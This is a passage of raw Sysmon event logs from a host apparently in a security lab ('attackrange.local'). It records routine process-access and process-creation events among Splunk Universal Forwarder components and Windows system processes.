Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.372{0C1E0330-F260-60EB-2D79-00000000D001}20883688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.216{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.216{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.217{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.591{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.591{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 